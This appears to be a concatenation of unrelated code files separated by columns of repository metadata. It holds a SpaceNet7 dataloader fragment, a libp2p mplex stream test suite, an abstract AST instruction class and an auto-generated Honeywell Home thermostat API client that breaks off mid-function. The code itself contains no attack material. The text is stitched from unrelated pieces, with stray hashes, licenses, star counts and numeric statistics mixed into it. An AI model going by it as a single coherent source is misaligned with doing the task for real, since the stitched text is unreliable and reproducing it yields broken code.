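            CLASSES=['building_footprint'],
            CONCAT_PREV_FRAME=False,
            CONCAT_NEXT_FRAME=False,
        ),
        MODEL=SimpleNamespace(DEVICE='cpu', IN_CHANNELS=3),
    )
    data_list = [
        {
            'image_masked': '/path/to/image_masked.tif',    # placeholder path
            'building_mask': '/path/to/building_mask.tif',  # placeholder path
        },
    ]
    dataset = SpaceNet7Dataset(config, data_list)
    return DataLoader(dataset, batch_size=1, shuffle=True)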
| 31.291304
| 78
| 0.561901
| 792
| 7,197
| 4.886364
| 0.135101
| 0.046512
| 0.057881
| 0.021705
| 0.80801
| 0.799742
| 0.799742
| 0.798191
| 0.798191
| 0.798191
| 0
| 0.005657
| 0.336807
| 7,197
| 229
| 79
| 31.427948
| 0.805154
| 0.180353
| 0
| 0.723077
| 0
| 0
| 0.038818
| 0
| 0
| 0
| 0
| 0
| 0.061538
| 1
| 0.046154
| false
| 0
| 0.030769
| 0
| 0.130769
| 0.007692
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3bc8bc1c8d156d0405e748965301100f567c58c7
| 7,162
|
py
|
Python
|
tests/stream_muxer/test_mplex_stream.py
|
g-r-a-n-t/py-libp2p
|
36a4a9150dcc53b42315b5c6868fccde5083963b
|
[
"Apache-2.0",
"MIT"
] | 315
|
2019-02-13T01:29:09.000Z
|
2022-03-28T13:44:07.000Z
|
tests/stream_muxer/test_mplex_stream.py
|
pipermerriam/py-libp2p
|
379a157d6b67e86a616b2458af519bbe5fb26a51
|
[
"Apache-2.0",
"MIT"
] | 249
|
2019-02-22T05:00:07.000Z
|
2022-03-29T16:30:46.000Z
|
tests/stream_muxer/test_mplex_stream.py
|
ralexstokes/py-libp2p
|
5144ab82894623969cb17baf0d4c64bd0a274068
|
[
"Apache-2.0",
"MIT"
] | 77
|
2019-02-24T19:45:17.000Z
|
2022-03-30T03:20:09.000Z
|
import pytest
import trio
from trio.testing import wait_all_tasks_blocked
from libp2p.stream_muxer.mplex.exceptions import (
MplexStreamClosed,
MplexStreamEOF,
MplexStreamReset,
)
from libp2p.stream_muxer.mplex.mplex import MPLEX_MESSAGE_CHANNEL_SIZE
from libp2p.tools.constants import MAX_READ_LEN
DATA = b"data_123"
@pytest.mark.trio
async def test_mplex_stream_read_write(mplex_stream_pair):
stream_0, stream_1 = mplex_stream_pair
await stream_0.write(DATA)
assert (await stream_1.read(MAX_READ_LEN)) == DATA
@pytest.mark.trio
async def test_mplex_stream_full_buffer(mplex_stream_pair):
stream_0, stream_1 = mplex_stream_pair
# Test: The message channel is of size `MPLEX_MESSAGE_CHANNEL_SIZE`.
# It should be fine to read even if there are already `MPLEX_MESSAGE_CHANNEL_SIZE`
# messages arriving.
for _ in range(MPLEX_MESSAGE_CHANNEL_SIZE):
await stream_0.write(DATA)
await wait_all_tasks_blocked()
# Sanity check
assert MAX_READ_LEN >= MPLEX_MESSAGE_CHANNEL_SIZE * len(DATA)
assert (await stream_1.read(MAX_READ_LEN)) == MPLEX_MESSAGE_CHANNEL_SIZE * DATA
# Test: Read after `MPLEX_MESSAGE_CHANNEL_SIZE + 1` messages have arrived, which
# exceeds the channel size. The stream should have been reset.
for _ in range(MPLEX_MESSAGE_CHANNEL_SIZE + 1):
await stream_0.write(DATA)
await wait_all_tasks_blocked()
with pytest.raises(MplexStreamReset):
await stream_1.read(MAX_READ_LEN)
@pytest.mark.trio
async def test_mplex_stream_pair_read_until_eof(mplex_stream_pair):
read_bytes = bytearray()
stream_0, stream_1 = mplex_stream_pair
async def read_until_eof():
read_bytes.extend(await stream_1.read())
expected_data = bytearray()
async with trio.open_nursery() as nursery:
nursery.start_soon(read_until_eof)
# Test: `read` doesn't return before `close` is called.
await stream_0.write(DATA)
expected_data.extend(DATA)
await trio.sleep(0.01)
assert len(read_bytes) == 0
# Test: `read` doesn't return before `close` is called.
await stream_0.write(DATA)
expected_data.extend(DATA)
await trio.sleep(0.01)
assert len(read_bytes) == 0
# Test: Close the stream, `read` returns, and receive previous sent data.
await stream_0.close()
assert read_bytes == expected_data
@pytest.mark.trio
async def test_mplex_stream_read_after_remote_closed(mplex_stream_pair):
stream_0, stream_1 = mplex_stream_pair
assert not stream_1.event_remote_closed.is_set()
await stream_0.write(DATA)
assert not stream_0.event_local_closed.is_set()
await trio.sleep(0.01)
await wait_all_tasks_blocked()
await stream_0.close()
assert stream_0.event_local_closed.is_set()
await trio.sleep(0.01)
await wait_all_tasks_blocked()
assert stream_1.event_remote_closed.is_set()
assert (await stream_1.read(MAX_READ_LEN)) == DATA
with pytest.raises(MplexStreamEOF):
await stream_1.read(MAX_READ_LEN)
@pytest.mark.trio
async def test_mplex_stream_read_after_local_reset(mplex_stream_pair):
stream_0, stream_1 = mplex_stream_pair
await stream_0.reset()
with pytest.raises(MplexStreamReset):
await stream_0.read(MAX_READ_LEN)
@pytest.mark.trio
async def test_mplex_stream_read_after_remote_reset(mplex_stream_pair):
stream_0, stream_1 = mplex_stream_pair
await stream_0.write(DATA)
await stream_0.reset()
# Sleep to let `stream_1` receive the message.
await trio.sleep(0.1)
await wait_all_tasks_blocked()
with pytest.raises(MplexStreamReset):
await stream_1.read(MAX_READ_LEN)
@pytest.mark.trio
async def test_mplex_stream_read_after_remote_closed_and_reset(mplex_stream_pair):
stream_0, stream_1 = mplex_stream_pair
await stream_0.write(DATA)
await stream_0.close()
await stream_0.reset()
# Sleep to let `stream_1` receive the message.
await trio.sleep(0.01)
assert (await stream_1.read(MAX_READ_LEN)) == DATA
@pytest.mark.trio
async def test_mplex_stream_write_after_local_closed(mplex_stream_pair):
stream_0, stream_1 = mplex_stream_pair
await stream_0.write(DATA)
await stream_0.close()
with pytest.raises(MplexStreamClosed):
await stream_0.write(DATA)
@pytest.mark.trio
async def test_mplex_stream_write_after_local_reset(mplex_stream_pair):
stream_0, stream_1 = mplex_stream_pair
await stream_0.reset()
with pytest.raises(MplexStreamClosed):
await stream_0.write(DATA)
@pytest.mark.trio
async def test_mplex_stream_write_after_remote_reset(mplex_stream_pair):
stream_0, stream_1 = mplex_stream_pair
await stream_1.reset()
await trio.sleep(0.01)
with pytest.raises(MplexStreamClosed):
await stream_0.write(DATA)
@pytest.mark.trio
async def test_mplex_stream_both_close(mplex_stream_pair):
stream_0, stream_1 = mplex_stream_pair
# Flags are not set initially.
assert not stream_0.event_local_closed.is_set()
assert not stream_1.event_local_closed.is_set()
assert not stream_0.event_remote_closed.is_set()
assert not stream_1.event_remote_closed.is_set()
# Streams are present in their `mplex_conn`.
assert stream_0 in stream_0.muxed_conn.streams.values()
assert stream_1 in stream_1.muxed_conn.streams.values()
# Test: Close one side.
await stream_0.close()
await trio.sleep(0.01)
assert stream_0.event_local_closed.is_set()
assert not stream_1.event_local_closed.is_set()
assert not stream_0.event_remote_closed.is_set()
assert stream_1.event_remote_closed.is_set()
# Streams are still present in their `mplex_conn`.
assert stream_0 in stream_0.muxed_conn.streams.values()
assert stream_1 in stream_1.muxed_conn.streams.values()
# Test: Close the other side.
await stream_1.close()
await trio.sleep(0.01)
# Both sides are closed.
assert stream_0.event_local_closed.is_set()
assert stream_1.event_local_closed.is_set()
assert stream_0.event_remote_closed.is_set()
assert stream_1.event_remote_closed.is_set()
# Streams are removed from their `mplex_conn`.
assert stream_0 not in stream_0.muxed_conn.streams.values()
assert stream_1 not in stream_1.muxed_conn.streams.values()
# Test: Reset after both close.
await stream_0.reset()
@pytest.mark.trio
async def test_mplex_stream_reset(mplex_stream_pair):
stream_0, stream_1 = mplex_stream_pair
await stream_0.reset()
await trio.sleep(0.01)
# Both sides are closed.
assert stream_0.event_local_closed.is_set()
assert stream_1.event_local_closed.is_set()
assert stream_0.event_remote_closed.is_set()
assert stream_1.event_remote_closed.is_set()
# Streams are removed from their `mplex_conn`.
assert stream_0 not in stream_0.muxed_conn.streams.values()
assert stream_1 not in stream_1.muxed_conn.streams.values()
# `close` should do nothing.
await stream_0.close()
await stream_1.close()
# `reset` should do nothing as well.
await stream_0.reset()
await stream_1.reset()
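# A hedged sketch of an additional test in the same style (not from the original
# suite). It assumes the same `mplex_stream_pair` fixture and that the muxed stream
# is bidirectional, which the tests above do not themselves exercise.
@pytest.mark.trio
async def test_mplex_stream_write_both_directions(mplex_stream_pair):
    stream_0, stream_1 = mplex_stream_pair
    await stream_0.write(DATA)
    await stream_1.write(DATA)
    assert (await stream_1.read(MAX_READ_LEN)) == DATA
    assert (await stream_0.read(MAX_READ_LEN)) == DATA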
| 34.104762
| 85
| 0.745043
| 1,094
| 7,162
| 4.542048
| 0.107861
| 0.078889
| 0.062789
| 0.044476
| 0.820286
| 0.784665
| 0.759106
| 0.728718
| 0.712216
| 0.66774
| 0
| 0.0235
| 0.174113
| 7,162
| 209
| 86
| 34.267943
| 0.816568
| 0.13823
| 0
| 0.75
| 0
| 0
| 0.001301
| 0
| 0
| 0
| 0
| 0
| 0.243243
| 1
| 0
| false
| 0
| 0.040541
| 0
| 0.040541
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3bf683b10b0c45d1a88e60f164677116b1eb3bf8
| 237
|
py
|
Python
|
compilacion/analisis_semantico/Ast/instruction.py
|
Gusta2307/Football-Simulation-IA-SIM-COM-
|
8c29c5b1ef61708a4f8b34f5e0e00990aeecfacd
|
[
"MIT"
] | null | null | null |
compilacion/analisis_semantico/Ast/instruction.py
|
Gusta2307/Football-Simulation-IA-SIM-COM-
|
8c29c5b1ef61708a4f8b34f5e0e00990aeecfacd
|
[
"MIT"
] | null | null | null |
compilacion/analisis_semantico/Ast/instruction.py
|
Gusta2307/Football-Simulation-IA-SIM-COM-
|
8c29c5b1ef61708a4f8b34f5e0e00990aeecfacd
|
[
"MIT"
] | 1
|
2022-02-07T04:47:15.000Z
|
2022-02-07T04:47:15.000Z
|
import abc
from compilacion.analisis_semantico.scope import Scope
from compilacion.analisis_semantico.Ast.AstNode import AstNode
class Instruction(AstNode):
@abc.abstractmethod
def execute(self, scope: Scope):
pass
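# A hedged, illustrative subclass (not part of the original AST): a block instruction
# that executes its child instructions in order. It relies only on the abstract
# interface declared above.
class ExampleBlock(Instruction):
    def __init__(self, instructions):
        # instructions: list of Instruction nodes to run sequentially
        self.instructions = instructions

    def execute(self, scope: Scope):
        for instruction in self.instructions:
            instruction.execute(scope)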
| 26.333333
| 62
| 0.78903
| 28
| 237
| 6.607143
| 0.571429
| 0.162162
| 0.248649
| 0.345946
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.147679
| 237
| 9
| 63
| 26.333333
| 0.915842
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0.142857
| 0.428571
| 0
| 0.714286
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
cbf1edf4ef82c6ea32c9a06aa846dc910ab6074a
| 49,650
|
py
|
Python
|
honeywell_home/api/default_api.py
|
dbarentine/udi-honeywellhome-poly
|
e89a3ff0e9a379d399813d42bf85e7c1215f6bc3
|
[
"MIT"
] | 1
|
2019-12-19T18:57:17.000Z
|
2019-12-19T18:57:17.000Z
|
honeywell_home/api/default_api.py
|
dbarentine/udi-honeywellhome-poly
|
e89a3ff0e9a379d399813d42bf85e7c1215f6bc3
|
[
"MIT"
] | 9
|
2020-03-01T19:51:06.000Z
|
2021-09-27T21:16:36.000Z
|
honeywell_home/api/default_api.py
|
dbarentine/udi-honeywellhome-poly
|
e89a3ff0e9a379d399813d42bf85e7c1215f6bc3
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
Honeywell Home
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from honeywell_home.api_client import ApiClient
from honeywell_home.exceptions import (
ApiTypeError,
ApiValueError
)
class DefaultApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def v2_devices_thermostats_device_id_fan_post(self, apikey, user_ref_id, location_id, device_id, update_fan_mode, **kwargs): # noqa: E501
"""Change the current Fan setting for specified DeviceID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v2_devices_thermostats_device_id_fan_post(apikey, user_ref_id, location_id, device_id, update_fan_mode, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str apikey: Your Client ID (required)
:param str user_ref_id: Your user ID (required)
:param str location_id: Location ID (required)
:param str device_id: Device ID (required)
:param UpdateFanMode update_fan_mode: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.v2_devices_thermostats_device_id_fan_post_with_http_info(apikey, user_ref_id, location_id, device_id, update_fan_mode, **kwargs) # noqa: E501
def v2_devices_thermostats_device_id_fan_post_with_http_info(self, apikey, user_ref_id, location_id, device_id, update_fan_mode, **kwargs): # noqa: E501
"""Change the current Fan setting for specified DeviceID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v2_devices_thermostats_device_id_fan_post_with_http_info(apikey, user_ref_id, location_id, device_id, update_fan_mode, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str apikey: Your Client ID (required)
:param str user_ref_id: Your user ID (required)
:param str location_id: Location ID (required)
:param str device_id: Device ID (required)
:param UpdateFanMode update_fan_mode: (required)
:param _return_http_data_only: response data without HTTP status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['apikey', 'user_ref_id', 'location_id', 'device_id', 'update_fan_mode'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v2_devices_thermostats_device_id_fan_post" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'apikey' is set
if ('apikey' not in local_var_params or
local_var_params['apikey'] is None):
raise ApiValueError("Missing the required parameter `apikey` when calling `v2_devices_thermostats_device_id_fan_post`") # noqa: E501
# verify the required parameter 'user_ref_id' is set
if ('user_ref_id' not in local_var_params or
local_var_params['user_ref_id'] is None):
raise ApiValueError("Missing the required parameter `user_ref_id` when calling `v2_devices_thermostats_device_id_fan_post`") # noqa: E501
# verify the required parameter 'location_id' is set
if ('location_id' not in local_var_params or
local_var_params['location_id'] is None):
raise ApiValueError("Missing the required parameter `location_id` when calling `v2_devices_thermostats_device_id_fan_post`") # noqa: E501
# verify the required parameter 'device_id' is set
if ('device_id' not in local_var_params or
local_var_params['device_id'] is None):
raise ApiValueError("Missing the required parameter `device_id` when calling `v2_devices_thermostats_device_id_fan_post`") # noqa: E501
# verify the required parameter 'update_fan_mode' is set
if ('update_fan_mode' not in local_var_params or
local_var_params['update_fan_mode'] is None):
raise ApiValueError("Missing the required parameter `update_fan_mode` when calling `v2_devices_thermostats_device_id_fan_post`") # noqa: E501
collection_formats = {}
path_params = {}
if 'device_id' in local_var_params:
path_params['deviceId'] = local_var_params['device_id'] # noqa: E501
query_params = []
if 'apikey' in local_var_params:
query_params.append(('apikey', local_var_params['apikey'])) # noqa: E501
if 'location_id' in local_var_params:
query_params.append(('locationId', local_var_params['location_id'])) # noqa: E501
header_params = {}
if 'user_ref_id' in local_var_params:
header_params['UserRefId'] = local_var_params['user_ref_id'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'update_fan_mode' in local_var_params:
body_params = local_var_params['update_fan_mode']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/v2/devices/thermostats/{deviceId}/fan', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def v2_devices_thermostats_device_id_get(self, apikey, user_ref_id, location_id, device_id, **kwargs): # noqa: E501
"""Return status of a thermostat # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v2_devices_thermostats_device_id_get(apikey, user_ref_id, location_id, device_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str apikey: Your Client ID (required)
:param str user_ref_id: Your user ID (required)
:param str location_id: Location ID (required)
:param str device_id: Device ID (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Thermostat
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.v2_devices_thermostats_device_id_get_with_http_info(apikey, user_ref_id, location_id, device_id, **kwargs) # noqa: E501
def v2_devices_thermostats_device_id_get_with_http_info(self, apikey, user_ref_id, location_id, device_id, **kwargs): # noqa: E501
"""Return status of a thermostat # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v2_devices_thermostats_device_id_get_with_http_info(apikey, user_ref_id, location_id, device_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str apikey: Your Client ID (required)
:param str user_ref_id: Your user ID (required)
:param str location_id: Location ID (required)
:param str device_id: Device ID (required)
:param _return_http_data_only: response data without HTTP status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(Thermostat, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['apikey', 'user_ref_id', 'location_id', 'device_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v2_devices_thermostats_device_id_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'apikey' is set
if ('apikey' not in local_var_params or
local_var_params['apikey'] is None):
raise ApiValueError("Missing the required parameter `apikey` when calling `v2_devices_thermostats_device_id_get`") # noqa: E501
# verify the required parameter 'user_ref_id' is set
if ('user_ref_id' not in local_var_params or
local_var_params['user_ref_id'] is None):
raise ApiValueError("Missing the required parameter `user_ref_id` when calling `v2_devices_thermostats_device_id_get`") # noqa: E501
# verify the required parameter 'location_id' is set
if ('location_id' not in local_var_params or
local_var_params['location_id'] is None):
raise ApiValueError("Missing the required parameter `location_id` when calling `v2_devices_thermostats_device_id_get`") # noqa: E501
# verify the required parameter 'device_id' is set
if ('device_id' not in local_var_params or
local_var_params['device_id'] is None):
raise ApiValueError("Missing the required parameter `device_id` when calling `v2_devices_thermostats_device_id_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'device_id' in local_var_params:
path_params['deviceId'] = local_var_params['device_id'] # noqa: E501
query_params = []
if 'apikey' in local_var_params:
query_params.append(('apikey', local_var_params['apikey'])) # noqa: E501
if 'location_id' in local_var_params:
query_params.append(('locationId', local_var_params['location_id'])) # noqa: E501
header_params = {}
if 'user_ref_id' in local_var_params:
header_params['UserRefId'] = local_var_params['user_ref_id'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/v2/devices/thermostats/{deviceId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Thermostat', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def v2_devices_thermostats_device_id_group_group_id_rooms_get(self, apikey, user_ref_id, location_id, device_id, group_id, **kwargs): # noqa: E501
"""Return status of sensors # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v2_devices_thermostats_device_id_group_group_id_rooms_get(apikey, user_ref_id, location_id, device_id, group_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str apikey: Your Client ID (required)
:param str user_ref_id: Your user ID (required)
:param str location_id: Location ID (required)
:param str device_id: Device ID (required)
:param int group_id: Group ID (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ThermostatSensor
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.v2_devices_thermostats_device_id_group_group_id_rooms_get_with_http_info(apikey, user_ref_id, location_id, device_id, group_id, **kwargs) # noqa: E501
def v2_devices_thermostats_device_id_group_group_id_rooms_get_with_http_info(self, apikey, user_ref_id, location_id, device_id, group_id, **kwargs): # noqa: E501
"""Return status of sensors # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v2_devices_thermostats_device_id_group_group_id_rooms_get_with_http_info(apikey, user_ref_id, location_id, device_id, group_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str apikey: Your Client ID (required)
:param str user_ref_id: Your user ID (required)
:param str location_id: Location ID (required)
:param str device_id: Device ID (required)
:param int group_id: Group ID (required)
:param _return_http_data_only: response data without HTTP status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ThermostatSensor, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['apikey', 'user_ref_id', 'location_id', 'device_id', 'group_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v2_devices_thermostats_device_id_group_group_id_rooms_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'apikey' is set
if ('apikey' not in local_var_params or
local_var_params['apikey'] is None):
raise ApiValueError("Missing the required parameter `apikey` when calling `v2_devices_thermostats_device_id_group_group_id_rooms_get`") # noqa: E501
# verify the required parameter 'user_ref_id' is set
if ('user_ref_id' not in local_var_params or
local_var_params['user_ref_id'] is None):
raise ApiValueError("Missing the required parameter `user_ref_id` when calling `v2_devices_thermostats_device_id_group_group_id_rooms_get`") # noqa: E501
# verify the required parameter 'location_id' is set
if ('location_id' not in local_var_params or
local_var_params['location_id'] is None):
raise ApiValueError("Missing the required parameter `location_id` when calling `v2_devices_thermostats_device_id_group_group_id_rooms_get`") # noqa: E501
# verify the required parameter 'device_id' is set
if ('device_id' not in local_var_params or
local_var_params['device_id'] is None):
raise ApiValueError("Missing the required parameter `device_id` when calling `v2_devices_thermostats_device_id_group_group_id_rooms_get`") # noqa: E501
# verify the required parameter 'group_id' is set
if ('group_id' not in local_var_params or
local_var_params['group_id'] is None):
raise ApiValueError("Missing the required parameter `group_id` when calling `v2_devices_thermostats_device_id_group_group_id_rooms_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'device_id' in local_var_params:
path_params['deviceId'] = local_var_params['device_id'] # noqa: E501
if 'group_id' in local_var_params:
path_params['groupId'] = local_var_params['group_id'] # noqa: E501
query_params = []
if 'apikey' in local_var_params:
query_params.append(('apikey', local_var_params['apikey'])) # noqa: E501
if 'location_id' in local_var_params:
query_params.append(('locationId', local_var_params['location_id'])) # noqa: E501
header_params = {}
if 'user_ref_id' in local_var_params:
header_params['UserRefId'] = local_var_params['user_ref_id'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/v2/devices/thermostats/{deviceId}/group/{groupId}/rooms', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ThermostatSensor', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def v2_devices_thermostats_device_id_post(self, apikey, user_ref_id, location_id, device_id, update_thermostat, **kwargs): # noqa: E501
"""Change the setpoint, system mode, and auto changeover status of a thermostat. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v2_devices_thermostats_device_id_post(apikey, user_ref_id, location_id, device_id, update_thermostat, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str apikey: Your Client ID (required)
:param str user_ref_id: Your user ID (required)
:param str location_id: Location ID (required)
:param str device_id: Device ID (required)
:param UpdateThermostat update_thermostat: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.v2_devices_thermostats_device_id_post_with_http_info(apikey, user_ref_id, location_id, device_id, update_thermostat, **kwargs) # noqa: E501
def v2_devices_thermostats_device_id_post_with_http_info(self, apikey, user_ref_id, location_id, device_id, update_thermostat, **kwargs): # noqa: E501
"""Change the setpoint, system mode, and auto changeover status of a thermostat. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v2_devices_thermostats_device_id_post_with_http_info(apikey, user_ref_id, location_id, device_id, update_thermostat, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str apikey: Your Client ID (required)
:param str user_ref_id: Your user ID (required)
:param str location_id: Location ID (required)
:param str device_id: Device ID (required)
:param UpdateThermostat update_thermostat: (required)
:param _return_http_data_only: response data without HTTP status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['apikey', 'user_ref_id', 'location_id', 'device_id', 'update_thermostat'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v2_devices_thermostats_device_id_post" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'apikey' is set
if ('apikey' not in local_var_params or
local_var_params['apikey'] is None):
raise ApiValueError("Missing the required parameter `apikey` when calling `v2_devices_thermostats_device_id_post`") # noqa: E501
# verify the required parameter 'user_ref_id' is set
if ('user_ref_id' not in local_var_params or
local_var_params['user_ref_id'] is None):
raise ApiValueError("Missing the required parameter `user_ref_id` when calling `v2_devices_thermostats_device_id_post`") # noqa: E501
# verify the required parameter 'location_id' is set
if ('location_id' not in local_var_params or
local_var_params['location_id'] is None):
